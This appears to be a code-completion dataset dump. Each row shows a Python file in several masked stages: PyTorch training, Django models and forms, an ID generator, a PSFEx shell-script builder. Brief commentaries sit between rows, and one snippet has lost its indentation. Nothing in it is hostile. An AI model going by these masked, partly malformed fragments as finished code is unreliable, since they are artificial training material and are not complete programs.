# Forward pass
outputs = model(image)
outputs = outputs.squeeze(0)
# outputs.reshape(1,)
loss = criterion(outputs, label)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# %%
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print("#############")
print(i,outputs, torch.sum(label))
# _, predicted = torch.max(outputs.data, 1)
# correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %'.format(len(test_images), 100 * correct / len(test_images)))
# %%
torch.save(model.state_dict(), 'model.ckpt')
# %%
| [
1,
4,
5,
6,
7
] |
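One caveat with the training script above: per the PyTorch docs, nn.SoftMarginLoss expects targets in {-1, +1}, while the labels it builds are 0/1, so label-0 samples contribute almost no gradient. With 0/1 labels and sigmoid outputs, binary cross-entropy is the usual pairing; a minimal sketch of that variant (the layer sizes echo the script, the dummy batch is mine):

import torch
import torch.nn as nn

head = nn.Sequential(nn.Linear(65536, 20), nn.Sigmoid(),
                     nn.Linear(20, 1), nn.Sigmoid())
criterion = nn.BCELoss()  # matches sigmoid outputs and 0/1 float targets

x = torch.rand(4, 65536)                        # dummy batch of 4 flattened images
y = torch.tensor([[1.0], [0.0], [1.0], [1.0]])  # 0/1 targets as floats
loss = criterion(head(x), y)
loss.backward()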
86 | 914f477518918619e0e42184bd03c2a7ed16bb01 | <mask token>
class Contact(models.Model):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| <mask token>
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.
PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| <mask token>
class Person(models.Model):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
def __str__(self):
        return str(self.nickname) + ' ' + self.last_name + ' ' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.
PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| <mask token>
class Person(models.Model):
id_person = models.AutoField(primary_key=True)
nickname = models.CharField(max_length=100, null=True)
first_name = models.CharField(max_length=100, null=True)
last_name = models.CharField(max_length=100, null=True)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE,
null=True, default=52)
birth_day = models.DateField(default='1900-01-01')
height = models.IntegerField(null=True)
    GENDER = (('Female', 'Female'), ('Male', 'Male'))
gender = models.CharField(max_length=20, choices=GENDER, null=True)
def __str__(self):
        return str(self.nickname) + ' ' + self.last_name + ' ' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.
PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who1')
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT,
related_name='who2')
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.
CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + ' - ' + str(self.start_date) + ' ' + str(
self.duration) + ' ' + str(self.description) + ' ' + str(self.
id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE,
unique=False)
| from django.db import models
class Location(models.Model):
id_location = models.AutoField(primary_key=True)
city = models.CharField(max_length=100, null=True)
street_name = models.CharField(max_length=100, null=True)
street_number = models.IntegerField(null=True)
zip = models.IntegerField(null=True)
country = models.CharField(max_length=100, null=True)
name = models.CharField(max_length=100, null=True)
latitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
longitude = models.DecimalField(max_digits=6, decimal_places=3, null=True)
def __str__(self):
# print('Name', type(self.name), '\nCountry', type(self.country), '\nCity', self.city)
return str(self.name) + ' - ' + str(self.country) + ': ' + str(self.city)
class Person(models.Model):
id_person = models.AutoField(primary_key=True)
nickname = models.CharField(max_length=100, null=True)
first_name = models.CharField(max_length=100, null=True)
last_name = models.CharField(max_length=100, null=True)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE, null=True, default=52)
birth_day = models.DateField(default='1900-01-01')
height = models.IntegerField(null=True)
GENDER = (
('Female', 'Female'),
('Male', 'Male'),
)
gender = models.CharField(max_length=20, choices=GENDER, null=True)
def __str__(self):
        return str(self.nickname) + ' ' + self.last_name + ' ' + self.first_name
class Contact_type(models.Model):
id_contact_type = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
validation_regexp = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Contact(models.Model):
id_contact = models.AutoField(primary_key=True)
id_person = models.ForeignKey(Person, on_delete=models.PROTECT)
id_contact_type = models.ForeignKey(Contact_type, on_delete=models.PROTECT, null=True)
contact = models.CharField(max_length=100, null=True)
def __str__(self):
return str(self.id_person) + ' ' + str(self.contact)
class Relation_type(models.Model):
id_relation = models.AutoField(primary_key=True)
name = models.CharField(max_length=100)
def __str__(self):
return str(self.name)
class Relation(models.Model):
id_relation = models.AutoField(primary_key=True)
id_person1 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who1")
id_person2 = models.ForeignKey(Person, on_delete=models.PROTECT, related_name="who2")
description = models.CharField(max_length=100, null=True)
id_relation_type = models.ForeignKey(Relation_type, on_delete=models.CASCADE)
class Meeting(models.Model):
id_meeting = models.AutoField(primary_key=True)
start_date = models.DateField(max_length=100)
start_time = models.TimeField(max_length=100)
description = models.CharField(max_length=100, null=True, default='')
duration = models.DurationField(default=0)
id_location = models.ForeignKey(Location, on_delete=models.CASCADE)
def __str__(self):
return str(self.start_time) + " - " + str(self.start_date) + " " + str(self.duration) + " " + str(
self.description) + " " + str(self.id_location)
class Person_meeting(models.Model):
id_person = models.ForeignKey(Person, on_delete=models.CASCADE)
id_meeting = models.ForeignKey(Meeting, on_delete=models.CASCADE, unique=False)
| [
11,
16,
18,
19,
24
] |
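Person_meeting above is a plain join model, so nothing prevents attaching the same person to the same meeting twice (the unique=False on the ForeignKey is already the default). A sketch of the usual guard, a UniqueConstraint in Meta; this is a suggested addition, not part of the original models:

from django.db import models

class PersonMeeting(models.Model):
    id_person = models.ForeignKey('Person', on_delete=models.CASCADE)
    id_meeting = models.ForeignKey('Meeting', on_delete=models.CASCADE)

    class Meta:
        constraints = [
            # one attendance row per (person, meeting) pair
            models.UniqueConstraint(fields=['id_person', 'id_meeting'],
                                    name='unique_person_per_meeting'),
        ]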
87 | cdbf9427d48f0a5c53b6efe0de7dfea65a8afd83 | <mask token>
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| <mask token>
def string_id(length=8):
""" Generate Random ID.
    Random ID contains ASCII letters and digits.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
    return ''.join(random_generator.choice(string.ascii_letters + string.digits)
                   for _ in range(length))
<mask token>
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| <mask token>
random_generator = random.SystemRandom()
def string_id(length=8):
""" Generate Random ID.
    Random ID contains ASCII letters and digits.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
    return ''.join(random_generator.choice(string.ascii_letters + string.digits)
                   for _ in range(length))
req_c = None
pid = None
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| import os
import random
import string
random_generator = random.SystemRandom()
def string_id(length=8):
""" Generate Random ID.
    Random ID contains ASCII letters and digits.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
    return ''.join(random_generator.choice(string.ascii_letters + string.digits)
                   for _ in range(length))
req_c = None
pid = None
def request_id():
global req_c, pid
if req_c is None:
req_c = random.randint(1000 * 1000, 1000 * 1000 * 1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| # -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <[email protected]>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import os
import random
import string
# Use the cryptographically safe random generator provided by the OS.
random_generator = random.SystemRandom()
def string_id(length=8):
""" Generate Random ID.
    Random ID contains ASCII letters and digits.
Args:
length (int): Character length of id.
Returns:
Random id string.
"""
    return ''.join(random_generator.choice(string.ascii_letters +
                                           string.digits)
                   for _ in range(length))
# Request ID Counter
####################
req_c = None
pid = None
def request_id():
    # Using random for every ID is slow; this is much quicker.
    # It caches the process id and then only appends an incrementing
    # counter per request.
    #
    # The result is not as unique as a random value, but it is highly
    # unlikely to collide with recent request ids.
global req_c, pid
if req_c is None:
req_c = random.randint(1000*1000, 1000*1000*1000)
if pid is None:
pid = str(os.getpid())
req_id = req_c = req_c + 1
req_id = hex(req_id)[2:].zfill(8)[-8:]
return pid + '-' + req_id
| [
1,
2,
3,
4,
5
] |
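The counter in request_id above is a plain global, so two threads could in principle read and increment it racily. A sketch of the same scheme built on itertools.count, whose next() is effectively a single atomic step under CPython's GIL; the output format matches the original:

import itertools
import os
import random

_pid = str(os.getpid())
_counter = itertools.count(random.randint(1_000_000, 1_000_000_000))

def request_id_threadsafe():
    # next() on an itertools.count is handled at C level in CPython
    return _pid + '-' + hex(next(_counter))[2:].zfill(8)[-8:]

print(request_id_threadsafe())  # e.g. '12345-3b9aca01' (varies per run)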
88 | c4624425f57211e583b5fbaec3943539ce6fea6f | <mask token>
| <mask token>
class BlogPostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = '__all__'
| from django import forms
from .models import BlogPost
class BlogPostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = '__all__'
| from django import forms
from . models import BlogPost
class BlogPostForm(forms.ModelForm):
class Meta:
model = BlogPost
fields = '__all__' | null | [
0,
1,
2,
3
] |
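A ModelForm with fields = '__all__' is normally driven from a view. A hypothetical create view for the form above (the template path and redirect target are assumptions):

from django.shortcuts import render, redirect
from .forms import BlogPostForm

def create_blog_post(request):
    form = BlogPostForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        form.save()                         # persists a new BlogPost row
        return redirect('blog_post_list')   # hypothetical URL name
    return render(request, 'blog/create.html', {'form': form})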
89 | a42f36fca2f65d0c5c9b65055af1814d8b4b3d42 | <mask token>
| <mask token>
BUILTINS_MODULE_NAME = 'builtins'
<mask token>
| #!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2023 Beartype authors.
# See "LICENSE" for further details.
'''
Project-wide **standard Python module globals** (i.e., global constants
describing modules and packages bundled with CPython's standard library).
This private submodule is *not* intended for importation by downstream callers.
'''
# ....................{ IMPORTS }....................
# ....................{ NAMES }....................
BUILTINS_MODULE_NAME = 'builtins'
'''
Fully-qualified name of the **builtins module** (i.e., objects defined by the
standard :mod:`builtins` module and thus globally available by default
*without* requiring explicit importation).
'''
| null | null | [
0,
1,
2
] |
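Since the constant above is just the module's name, resolving it at runtime is a one-liner; a small demonstration using plain stdlib importlib, not beartype internals:

import importlib

BUILTINS_MODULE_NAME = 'builtins'
builtins_module = importlib.import_module(BUILTINS_MODULE_NAME)
assert builtins_module.len is len  # builtins are available without importing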
90 | c23125018a77508dad6fd2cb86ec6d556fbd1019 | <mask token>
| <mask token>
os.system('psfex -dd > config.psfex')
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
<mask token>
f.write('\n')
f.write('#############################' + '\n')
f.write('##### Scripts for PSFEx #####' + '\n')
f.write('#############################' + '\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_' + flt + '.cat\n')
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +
'-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')
f.write(
f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')
f.write(
f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '
)
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +
'-' + flt + '.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +
flt + '.xml\n')
f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +
flt + '.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
if glob.glob('PSFEx/') == []:
os.system('mkdir PSFEx')
else:
os.system('rm -rfv PSFEx/*')
os.system('sh psfex_all.sh')
os.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')
os.system('mv -v prepsfex_*-*.cat PSFEx/')
os.system('rm -rfv ./*.fits prepsfex_*.cat')
print('--- %s seconds ---' % (time.time() - start_time))
| <mask token>
start_time = time.time()
<mask token>
os.system('psfex -dd > config.psfex')
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh', 'w')
f.write('\n')
f.write('#############################' + '\n')
f.write('##### Scripts for PSFEx #####' + '\n')
f.write('#############################' + '\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_' + flt + '.cat\n')
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +
'-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')
f.write(
f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')
f.write(
f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '
)
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +
'-' + flt + '.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +
flt + '.xml\n')
f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +
flt + '.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
if glob.glob('PSFEx/') == []:
os.system('mkdir PSFEx')
else:
os.system('rm -rfv PSFEx/*')
os.system('sh psfex_all.sh')
os.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')
os.system('mv -v prepsfex_*-*.cat PSFEx/')
os.system('rm -rfv ./*.fits prepsfex_*.cat')
print('--- %s seconds ---' % (time.time() - start_time))
| <mask token>
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
os.system('psfex -dd > config.psfex')
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh', 'w')
f.write('\n')
f.write('#############################' + '\n')
f.write('##### Scripts for PSFEx #####' + '\n')
f.write('#############################' + '\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : ' + ic.fields[i] + ' ----- #' + '\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_' + flt + '.cat\n')
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + flt + '.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('sex Images/' + prefix + ic.fields[i] + '-' + flt +
'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_' + ic.fields[i] +
'-' + flt + '.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(
ic.THRES_psf))
f.write(
f"""-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}
"""
)
f.write('psfex prepsfex_' + flt + '.cat -c config.psfex ')
f.write(
f'-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ')
f.write(
f'-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} '
)
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_' + ic.fields[i] +
'-' + flt + '.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_' + ic.fields[i] + '-' +
flt + '.xml\n')
f.write('mv -v prepsfex_' + flt + '.psf psf_' + ic.fields[i] + '-' +
flt + '.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
if glob.glob('PSFEx/') == []:
os.system('mkdir PSFEx')
else:
os.system('rm -rfv PSFEx/*')
os.system('sh psfex_all.sh')
os.system('mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/')
os.system('mv -v prepsfex_*-*.cat PSFEx/')
os.system('rm -rfv ./*.fits prepsfex_*.cat')
print('--- %s seconds ---' % (time.time() - start_time))
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 21 11:40:26 2020
@author: jlee
"""
import time
start_time = time.time()
import numpy as np
import glob, os
from astropy.io import fits
import init_cfg as ic
# ----- Making scripts for PSFEx ----- #
os.system("psfex -dd > config.psfex")
if ic.use_backsub:
prefix = 'b'
else:
prefix = ''
f = open('psfex_all.sh','w')
f.write('\n')
f.write('#############################'+'\n')
f.write('##### Scripts for PSFEx #####'+'\n')
f.write('#############################'+'\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_'+flt+'.cat\n')
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')
f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ")
f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ")
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n')
f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
# ----- Running scripts for PSFEx ----- #
if (glob.glob("PSFEx/") == []):
os.system("mkdir PSFEx")
else:
os.system("rm -rfv PSFEx/*")
os.system("sh psfex_all.sh")
os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/")
os.system("mv -v prepsfex_*-*.cat PSFEx/")
os.system("rm -rfv ./*.fits prepsfex_*.cat")
# Printing the running time
print("--- %s seconds ---" % (time.time() - start_time))
| [
0,
1,
2,
3,
4
] |
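The pipeline above shells out with os.system, which silently ignores non-zero exit codes. A sketch of routing the same calls through subprocess.run with check=True so a failing invocation raises; the commands are the script's, the wrapper is my addition:

import shlex
import subprocess

def run(cmd, stdout=None):
    # check=True raises CalledProcessError on a non-zero exit status
    subprocess.run(shlex.split(cmd), check=True, stdout=stdout)

with open('config.psfex', 'w') as cfg:
    run('psfex -dd', stdout=cfg)   # replaces: os.system("psfex -dd > config.psfex")

run('sh psfex_all.sh')             # a non-zero exit from the script now raises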
91 | 81688d51696156905736b5de7a4929387fd385ab | <mask token>
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
